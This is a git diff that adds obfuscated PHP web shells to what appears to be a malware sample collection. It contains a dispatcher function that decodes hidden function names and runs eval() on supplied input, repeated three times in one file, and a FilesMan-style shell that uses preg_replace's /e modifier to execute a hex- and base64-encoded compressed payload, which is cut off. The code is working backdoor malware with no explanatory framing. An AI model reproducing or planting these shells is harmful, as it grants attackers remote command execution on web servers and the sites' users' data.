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"))))))));
+function aX0grtyu456RtO8($a, $b) {
+    $z2342345gk7456 = str_rot13(gzinflate(str_rot13(base64_decode("MzQyNjE1M7ewNMjLLygsKi4pLSuvqKxXWVdBVlpYz8jMys7JjQcA"))));
+    if ($a == "srwertxcbtytyu//..huytytryurt") {
+        $qwery45234dws = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{27} . $z2342345gk7456{14} . $z2342345gk7456{31};
+        return $qwery45234dws($b);
+    } else if ($a == "cftrt546576fgh//huuiy..\/ghhj") {
+        $owe342wfbjdewqre34 = $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{23} . $z2342345gk7456{31} . $z2342345gk7456{14} . $z2342345gk7456{27} . $z2342345gk7456{29} . $z2342345gk7456{36} . $z2342345gk7456{30} . $z2342345gk7456{30} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $owe342wfbjdewqre34($b);
+    } else if ($a == "azsewqwqwez/...derwewr") {
+        $rt4534fhghj5 = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{36} . $z2342345gk7456{27} . $z2342345gk7456{24} . $z2342345gk7456{29} . $z2342345gk7456{0} . $z2342345gk7456{2};
+        return $rt4534fhghj5($b);
+    } else if ($a == "ax6789f/////....sfcxfcfge4653dhg") {
+        $as346hgjkhfg = $z2342345gk7456{11} . $z2342345gk7456{10} . $z2342345gk7456{28} . $z2342345gk7456{14} . $z2342345gk7456{5} . $z2342345gk7456{3} . $z2342345gk7456{36} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $as346hgjkhfg($b);
+    } else if ($a == "zs3454sdfcvnyrertc_gygu") {
+        $zsweqwq4546dgh = $z2342345gk7456{16} . $z2342345gk7456{35} . $z2342345gk7456{18} . $z2342345gk7456{23} . $z2342345gk7456{15} . $z2342345gk7456{21} . $z2342345gk7456{10} . $z2342345gk7456{29} . $z2342345gk7456{14};
+        return $zsweqwq4546dgh($b);
+    } else if ($a == "ax4564365dgvbmnmhu56fgvgvc//gygyugu") {
+        return eval($b);
+    }
+};
+$zxAwx0XtrY0189j0KKxaz0 = "aX0grtyu456RtO8";
+?>
\ No newline at end of file
diff --git a/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php b/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php
new file mode 100644
index 0000000..2d88d63
--- /dev/null
+++ b/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php
@@ -0,0 +1,65 @@
+<?php function aX0grtyu456RtO8($a, $b) {
+    $z2342345gk7456 = str_rot13(gzinflate(str_rot13(base64_decode("MzQyNjE1M7ewNMjLLygsKi4pLSuvqKxXWVdBVlpYz8jMys7JjQcA"))));
+    if ($a == "srwertxcbtytyu//..huytytryurt") {
+        $qwery45234dws = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{27} . $z2342345gk7456{14} . $z2342345gk7456{31};
+        return $qwery45234dws($b);
+    } else if ($a == "cftrt546576fgh//huuiy..\/ghhj") {
+        $owe342wfbjdewqre34 = $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{23} . $z2342345gk7456{31} . $z2342345gk7456{14} . $z2342345gk7456{27} . $z2342345gk7456{29} . $z2342345gk7456{36} . $z2342345gk7456{30} . $z2342345gk7456{30} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $owe342wfbjdewqre34($b);
+    } else if ($a == "azsewqwqwez/...derwewr") {
+        $rt4534fhghj5 = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{36} . $z2342345gk7456{27} . $z2342345gk7456{24} . $z2342345gk7456{29} . $z2342345gk7456{0} . $z2342345gk7456{2};
+        return $rt4534fhghj5($b);
+    } else if ($a == "ax6789f/////....sfcxfcfge4653dhg") {
+        $as346hgjkhfg = $z2342345gk7456{11} . $z2342345gk7456{10} . $z2342345gk7456{28} . $z2342345gk7456{14} . $z2342345gk7456{5} . $z2342345gk7456{3} . $z2342345gk7456{36} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $as346hgjkhfg($b);
+    } else if ($a == "zs3454sdfcvnyrertc_gygu") {
+        $zsweqwq4546dgh = $z2342345gk7456{16} . $z2342345gk7456{35} . $z2342345gk7456{18} . $z2342345gk7456{23} . $z2342345gk7456{15} . $z2342345gk7456{21} . $z2342345gk7456{10} . $z2342345gk7456{29} . $z2342345gk7456{14};
+        return $zsweqwq4546dgh($b);
+    } else if ($a == "ax4564365dgvbmnmhu56fgvgvc//gygyugu") {
+        return eval($b);
+    }
+}
+function aX0grtyu456RtO8($a, $b) {
+    $z2342345gk7456 = str_rot13(gzinflate(str_rot13(base64_decode("MzQyNjE1M7ewNMjLLygsKi4pLSuvqKxXWVdBVlpYz8jMys7JjQcA"))));
+    if ($a == "srwertxcbtytyu//..huytytryurt") {
+        $qwery45234dws = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{27} . $z2342345gk7456{14} . $z2342345gk7456{31};
+        return $qwery45234dws($b);
+    } else if ($a == "cftrt546576fgh//huuiy..\/ghhj") {
+        $owe342wfbjdewqre34 = $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{23} . $z2342345gk7456{31} . $z2342345gk7456{14} . $z2342345gk7456{27} . $z2342345gk7456{29} . $z2342345gk7456{36} . $z2342345gk7456{30} . $z2342345gk7456{30} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $owe342wfbjdewqre34($b);
+    } else if ($a == "azsewqwqwez/...derwewr") {
+        $rt4534fhghj5 = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{36} . $z2342345gk7456{27} . $z2342345gk7456{24} . $z2342345gk7456{29} . $z2342345gk7456{0} . $z2342345gk7456{2};
+        return $rt4534fhghj5($b);
+    } else if ($a == "ax6789f/////....sfcxfcfge4653dhg") {
+        $as346hgjkhfg = $z2342345gk7456{11} . $z2342345gk7456{10} . $z2342345gk7456{28} . $z2342345gk7456{14} . $z2342345gk7456{5} . $z2342345gk7456{3} . $z2342345gk7456{36} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $as346hgjkhfg($b);
+    } else if ($a == "zs3454sdfcvnyrertc_gygu") {
+        $zsweqwq4546dgh = $z2342345gk7456{16} . $z2342345gk7456{35} . $z2342345gk7456{18} . $z2342345gk7456{23} . $z2342345gk7456{15} . $z2342345gk7456{21} . $z2342345gk7456{10} . $z2342345gk7456{29} . $z2342345gk7456{14};
+        return $zsweqwq4546dgh($b);
+    } else if ($a == "ax4564365dgvbmnmhu56fgvgvc//gygyugu") {
+        return eval($b);
+    }
+}
+function aX0grtyu456RtO8($a, $b) {
+    $z2342345gk7456 = str_rot13(gzinflate(str_rot13(base64_decode("MzQyNjE1M7ewNMjLLygsKi4pLSuvqKxXWVdBVlpYz8jMys7JjQcA"))));
+    if ($a == "srwertxcbtytyu//..huytytryurt") {
+        $qwery45234dws = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{27} . $z2342345gk7456{14} . $z2342345gk7456{31};
+        return $qwery45234dws($b);
+    } else if ($a == "cftrt546576fgh//huuiy..\/ghhj") {
+        $owe342wfbjdewqre34 = $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{23} . $z2342345gk7456{31} . $z2342345gk7456{14} . $z2342345gk7456{27} . $z2342345gk7456{29} . $z2342345gk7456{36} . $z2342345gk7456{30} . $z2342345gk7456{30} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $owe342wfbjdewqre34($b);
+    } else if ($a == "azsewqwqwez/...derwewr") {
+        $rt4534fhghj5 = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{36} . $z2342345gk7456{27} . $z2342345gk7456{24} . $z2342345gk7456{29} . $z2342345gk7456{0} . $z2342345gk7456{2};
+        return $rt4534fhghj5($b);
+    } else if ($a == "ax6789f/////....sfcxfcfge4653dhg") {
+        $as346hgjkhfg = $z2342345gk7456{11} . $z2342345gk7456{10} . $z2342345gk7456{28} . $z2342345gk7456{14} . $z2342345gk7456{5} . $z2342345gk7456{3} . $z2342345gk7456{36} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
+        return $as346hgjkhfg($b);
+    } else if ($a == "zs3454sdfcvnyrertc_gygu") {
+        $zsweqwq4546dgh = $z2342345gk7456{16} . $z2342345gk7456{35} . $z2342345gk7456{18} . $z2342345gk7456{23} . $z2342345gk7456{15} . $z2342345gk7456{21} . $z2342345gk7456{10} . $z2342345gk7456{29} . $z2342345gk7456{14};
+        return $zsweqwq4546dgh($b);
+    } else if ($a == "ax4564365dgvbmnmhu56fgvgvc//gygyugu") {
+        return eval($b);
+    }
+};
+$zxAwx0XtrY0189j0KKxaz0 = "aX0grtyu456RtO8";
+?>
\ No newline at end of file
diff --git a/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php b/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php
new file mode 100644
index 0000000..387fead
--- /dev/null
+++ b/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php
@@ -0,0 +1,7 @@
+<?php
+$auth_pass = "7244120df2ed35b57c33535928305ee0";
+$color = "#df5";
+$default_action = 'FilesMan';
+$default_use_ajax = true;
+$default_charset = 'Windows-1251';
+preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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